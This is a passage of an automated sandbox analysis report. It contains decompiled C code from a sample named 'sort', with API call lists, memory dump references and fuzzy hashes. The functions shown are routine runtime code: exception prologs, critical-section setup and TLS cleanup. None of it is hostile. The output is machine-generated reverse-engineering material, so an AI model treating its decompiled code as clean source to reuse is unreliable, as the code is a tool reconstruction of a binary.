                                            				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
                                            				return _t52;
                                            			}








                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040E078
                                              • Part of subcall function 0040E0CD: __EH_prolog.LIBCMT ref: 0040E0D2
                                              • Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prolog$ExceptionRaise
                                            • String ID: ios::failbit set$string too long
                                            • API String ID: 2062786585-1331328489
                                            • Opcode ID: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
                                            • Instruction ID: 323c5a97231c9e7e2180db571d543564ba768becdaa7b618deba2c25bb2dd9de
                                            • Opcode Fuzzy Hash: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
                                            • Instruction Fuzzy Hash: 68F03A62D111286ACB04F6E6EC42AEEBB7CAF08345F40407AF411B6092DB785608CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E00425BA0(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				void* _t29;
                                            				intOrPtr _t32;
                                            				long* _t37;
                                            				intOrPtr* _t42;
                                            				signed int _t45;
                                            				struct _CRITICAL_SECTION* _t46;
                                            				intOrPtr* _t49;
                                            
                                            				_push(__ecx);
                                            				_t49 = _a4;
                                            				_t37 = __ecx;
                                            				_t45 = 1;
                                            				_v8 = _t45;
                                            				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
                                            					L10:
                                            					_t46 =  &(_t37[7]);
                                            					EnterCriticalSection(_t46);
                                            					E0042581A( &(_t37[5]), _t49);
                                            					LeaveCriticalSection(_t46);
                                            					LocalFree( *(_t49 + 0xc));
                                            					if(_t49 != 0) {
                                            						 *((intOrPtr*)( *_t49))(1);
                                            					}
                                            					_t29 = TlsSetValue( *_t37, 0);
                                            					L13:
                                            					return _t29;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				do {
                                            					L1:
                                            					_t32 = _a8;
                                            					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
                                            						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
                                            						if(_t42 != 0) {
                                            							 *((intOrPtr*)( *_t42))(1);
                                            						}
                                            						_t29 =  *(_t49 + 0xc);
                                            						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
                                            					} else {
                                            						_t29 =  *(_t49 + 0xc);
                                            						if( *(_t29 + _t45 * 4) != 0) {
                                            							_v8 = _v8 & 0x00000000;
                                            						}
                                            					}
                                            					_t45 = _t45 + 1;
                                            				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
                                            				if(_v8 == 0) {
                                            					goto L13;
                                            				}
                                            				goto L10;
                                            			}












                                            APIs
                                            • EnterCriticalSection.KERNEL32(?), ref: 00425BFD
                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 00425C0D
                                            • LocalFree.KERNEL32(?), ref: 00425C16
                                            • TlsSetValue.KERNEL32(?,00000000), ref: 00425C2C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                            • String ID:
                                            • API String ID: 2949335588-0
                                            • Opcode ID: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
                                            • Instruction ID: 2aca870bf4ceec97ac406f80c089e65d4ca4c841141b20e4fc51915e0dfd648f
                                            • Opcode Fuzzy Hash: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
                                            • Instruction Fuzzy Hash: BA21AC31305724EFC7249F45E888B6A7BA4FF40712F9080AEE5428B2A1D7B8F841CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00425F56(signed int _a4) {
                                            				void* _t14;
                                            				struct _CRITICAL_SECTION* _t16;
                                            				signed int _t22;
                                            				intOrPtr* _t25;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            
                                            				_t30 =  *0x439bdc; // 0x1
                                            				if(_t30 == 0) {
                                            					_t14 = E00425EC3();
                                            				}
                                            				_t31 =  *0x439bd8; // 0x0
                                            				if(_t31 == 0) {
                                            					_t22 = _a4;
                                            					_t25 = 0x4399e0 + _t22 * 4;
                                            					if( *((intOrPtr*)(0x4399e0 + _t22 * 4)) == 0) {
                                            						EnterCriticalSection(0x439a28);
                                            						if( *_t25 == 0) {
                                            							InitializeCriticalSection(0x439a40 + (_t22 + _t22 * 2) * 8);
                                            							 *_t25 =  *_t25 + 1;
                                            						}
                                            						LeaveCriticalSection(0x439a28);
                                            					}
                                            					_t16 = 0x439a40 + (_t22 + _t22 * 2) * 8;
                                            					EnterCriticalSection(_t16);
                                            					return _t16;
                                            				}
                                            				return _t14;
                                            			}










                                            APIs
                                            • EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
                                            • LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
                                            • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE
                                              • Part of subcall function 00425EC3: GetVersion.KERNEL32(?,00425F66,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425ED6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                            • String ID:
                                            • API String ID: 1193629340-0
                                            • Opcode ID: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
                                            • Instruction ID: b3ac33658b3b741abd4bb59a3792cd3dace0394c803b1a2d8ae3ffca9e92013f
                                            • Opcode Fuzzy Hash: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
                                            • Instruction Fuzzy Hash: 00F0497160472ADFCB20EF64FC84997B3ACFB18316B81203BE64582161D774B956DBAC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004079AB(void* __eax) {
                                            				void* _t1;
                                            
                                            				_t1 = __eax;
                                            				InitializeCriticalSection( *0x436f2c);
                                            				InitializeCriticalSection( *0x436f1c);
                                            				InitializeCriticalSection( *0x436f0c);
                                            				InitializeCriticalSection( *0x436eec);
                                            				return _t1;
                                            			}





                                            APIs
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079B8
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C0
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C8
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079D0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CriticalInitializeSection
                                            • String ID:
                                            • API String ID: 32694325-0
                                            • Opcode ID: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
                                            • Instruction ID: 7b146446db7a68f273d69e9c37099d6d57513ee84f4d93e1aa445e082747f6c1
                                            • Opcode Fuzzy Hash: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
                                            • Instruction Fuzzy Hash: 67C00235905135FADF516B75FC058493F25EB063A0312E172E5145103487631C15EFD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%